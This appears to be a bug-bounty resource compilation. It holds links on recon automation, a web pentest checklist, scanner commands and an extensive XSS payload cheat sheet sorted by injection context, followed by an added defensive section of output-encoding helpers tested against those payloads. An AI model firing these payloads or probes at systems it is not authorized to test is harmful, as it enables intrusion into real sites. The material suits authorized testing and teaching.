🤑Bug Bounty VPS Setup🤑
Bug Hunting Autopilot VPS by Om Arora
https://lnkd.in/dkhvZ54t
Setup Bug Bounty Automation by sm4rty
https://lnkd.in/dRW3yX32
VPS Bug Bounty Tools by drak3shift7
https://lnkd.in/dbVwcveD
Setup DigitalOcean VPS to Bug Bounty by SimbaTech
https://lnkd.in/dse2BhkE
Using VPS for Bug Bounty, comparing VPS providers
https://lnkd.in/dZUtg3Hr
Bug Bounty Tools config in VPS by Iheb Hamad
https://lnkd.in/d42rqzwW
Beginners Guide: VPS Setup for Bug Bounty Recon Automation
https://lnkd.in/dxeEAYxJ
Notification system for your Bug Bounty Automation by Ranjan Kumar
https://lnkd.in/djfBqR-4
Emissary Tool (Send notifications via different channels such as Slack, Telegram or Teams in your bug bounty flow) by BountyStrike
https://lnkd.in/dX-aGhRw
SSRF! : Get notified on discord whenever you have an SSRF by a1bi_n_
https://lnkd.in/dsVsj_qq
🚨Web Pentesting Checklist by Ott3rly 🚨
- API docs/support pages. Explore functionality to understand the app better.
- Plans and pricing. Identify limitations of different plans, your goal will be detecting ways to bypass them.
- Register functionality. IDORs, unexpiring tokens, reused tokens.
- Password reset.
- 2FA.
- User Management (auth model). Try to build RBAC matrix.
- My profile section.
- User invites
- See if inviting an existing user to your org exposes their name
- See if inviting an existing user removes them from their own org
- User management
- Customer data
- Look for JS, ctrl+f and try to find /admin /api and etc.
- Look for API
- If an endpoint has api/v2/, try api/v1/
- Undocumented API Calls and Admin tools
- Upload functions
- Integration functions
- Look for subdomains; don't hack on them since they will be OOS, but try to find a way to elevate it to your main target.
- If you find a bug that's OOS, still ask the customer if they care
Cart section
- Integer overflow
- Business logic errors (-1 number of items)
- Rate limit on coupon
- Race condition on coupon
- Any interesting parameters
Giftcards
- Any interesting parameters
- Race condition
- Reflected XSS
- API endpoint enumeration
Intercom
- Intercom('show');
- Intercom('boot',{email:'known_user@gmail.com'})
🚨afrog - A Security Tool for Bug Bounty, Pentest and Red Teaming🚨
📥Download - https://github.com/zan8in/afrog/
👉Usage -
✅afrog -T urls.txt -S high,critical,medium -o result.html
✅afrog -t https://example.com -S high,critical
🌟use xargs with gau to scan bulk domains without losing speed🌟
👉Command
xargs -a alive.txt -I@ sh -c 'gau --blacklist css,jpg,jpeg,JPEG,ott,noscript,js,ttf,png,woff2,woff,eot,gif "@"' | tee -a gau.txt
🌟XSS Secrets by Donald Bucks🌟
HTML Injection
File Upload Injection – Filename
File Upload Injection – Metadata
File Upload Injection – SVG File
DOM Insert Injection
DOM Insert Injection – Resource Request
PHP Self URL Injection
HTML Injection
Use when input lands inside an attribute’s value of an HTML tag or outside tag except the ones described in next case. Prepend a “-->” to payload if input lands in HTML comments.
<svg onload=alert(1)>
"><svg onload=alert(1)>
HTML Injection – Tag Block Breakout
Use when input lands inside or between opening/closing of the following tags:
<title><style><script><textarea><noscript><pre><xmp> and <iframe> (</tag> is accordingly).
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
HTML Injection - Inline
Use when input lands inside an attribute’s value of an HTML tag but that tag can’t be terminated by greater than sign (>).
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
HTML Injection - Source
Use when input lands as a value of the following HTML tag attributes: href, src, data or action (also formaction). Src attribute in script tags can be a URL or “data:,alert(1)”.
javascript:alert(1)
Javascript Injection
Use when input lands in a script block, inside a string delimited value.
'-alert(1)-'
'/alert(1)//
Javascript Injection - Escape Bypass
Use when input lands in a script block, inside a string delimited value but quotes are escaped by a backslash.
\'/alert(1)//
Javascript Injection – Script Breakout
Use when input lands anywhere within a script block.
</script><svg onload=alert(1)>
Javascript Injection - Logical Block
Use 1st or 2nd payloads when input lands in a script block, inside a string delimited value and inside a single logical block like function or conditional (if, else, etc). If quote is escaped with a backslash, use 3rd payload.
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
Javascript Injection - Quoteless
Use when there’s multi reflection in the same line of JS code. 1st payload works in simple JS variables and 2nd one works in non-nested JS objects.
/alert(1)//\
/alert(1)}//\
Javascript Context - Placeholder Injection in Template Literal
Use when input lands inside backticks (``) delimited strings or in template engines.
${alert(1)}
Multi Reflection HTML Injection - Double Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
/alert(1)</script><script>/
Multi Reflection HTML Injection - Triple Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
/alert(1)">'onload="/<svg/1='
-alert(1)">'onload="<svg/1='
/</script>'>alert(1)/<script/1='
Multi Input Reflections HTML Injection - Double & Triple
Use to take advantage of multiple input reflections on same page. Also useful in HPP (HTTP Parameter Pollution) scenarios, where there are reflections for repeated parameters. 3rd payload makes use of comma-separated reflections of the same parameter.
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/&r=/alert(1)'>
q=<script/&q=/src=data:&q=alert(1)>
File Upload Injection – Filename
Use when uploaded filename is reflected somewhere in target page.
"><svg onload=alert(1)>.gif
File Upload Injection – Metadata
Use when metadata of uploaded file is reflected somewhere in target page. It uses command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.
$ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
File Upload Injection – SVG File
Use to create a stored XSS on target when uploading image files. Save content below as “xss.svg”.
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
DOM Insert Injection
Use to test for XSS when injection gets inserted into DOM as valid markup instead of being reflected in source code. It works for cases where script tag and other vectors won’t work.
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<script><svg onload=alert(1)>
DOM Insert Injection – Resource Request
Use when native javascript code inserts into page the results of a request to a URL that can be controlled by attacker.
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
PHP Self URL Injection
Use when current URL is used by target’s underlying PHP code as an attribute value of an HTML form, for example. Inject between php extension and start of query part (?) using a leading slash (/).
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
Markdown Vector
Use in text boxes, comment sections, etc that allows some markup input. Click to fire.
[clickme](javascript:alert`1`)
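Seen from the defending side, each landing context in the cheat sheet above needs its own output encoder, and HTML escaping alone does nothing in a URL or script-string context. The following is an added example, not part of the original post or the cheat sheet it quotes; the helper names and the app.example base URL are assumptions, and the samples are constructed from the payload kinds listed above.

```javascript
// Added example: one encoder per output context (helper names are hypothetical).
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// HTML body text or a *quoted* attribute value.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Quoted JS string inside a script block: every code unit outside [A-Za-z0-9 ]
// becomes \uXXXX, so quotes, backslashes, "</", backticks and "${" lose meaning.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// href/src/action value: allow-list the scheme first, then HTML-encode.
// The base URL is a constructed placeholder used to resolve relative links.
function encodeUrlAttr(value, base = 'https://app.example/') {
  let url;
  try { url = new URL(String(value), base); } catch (e) { return '#'; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return '#';
  return encodeHtml(url.href);
}

// Constructed samples: payload strings of the kinds listed above, by context.
const SAMPLES = [
  ['html', '<img src=1 onerror=alert(1)>'],
  ['html', '"autofocus onfocus=alert(1) //'],
  ['js', "'-alert(1)-'"],
  ['js', "\\'/alert(1)//"],
  ['js', '${alert(1)}'],
  ['url', 'javascript:alert(1)'],
  ['url', 'data:text/html,<img src=1 onerror=alert(1)>'],
];

// Returns the samples that would still be live after encoding (expected: none).
function findUnsafe(samples = SAMPLES) {
  return samples.filter(([context, payload]) => {
    if (context === 'html') return /[<>"']/.test(encodeHtml(payload));
    if (context === 'js') return /[^A-Za-z0-9 \\]/.test(encodeJsString(payload));
    return encodeUrlAttr(payload) !== '#';
  });
}

// HTML encoding leaves a javascript: URL untouched, which is why the URL
// context needs the scheme allow-list instead.
console.log(findUnsafe().length, encodeHtml('javascript:alert(1)'));
```

encodeHtml is only safe for quoted attribute values; an unquoted attribute can be broken out of with a space, so templates should always quote.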
🌟Dnsbruter- Dns Bruteforcing Tool🌟
👉It is a powerful tool designed to perform active subdomain enumeration and discovery.
🔗Link https://github.com/sanjai-AK47/Dnsbruter/
🌟Bug Bounty PoC's🌟
✅https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x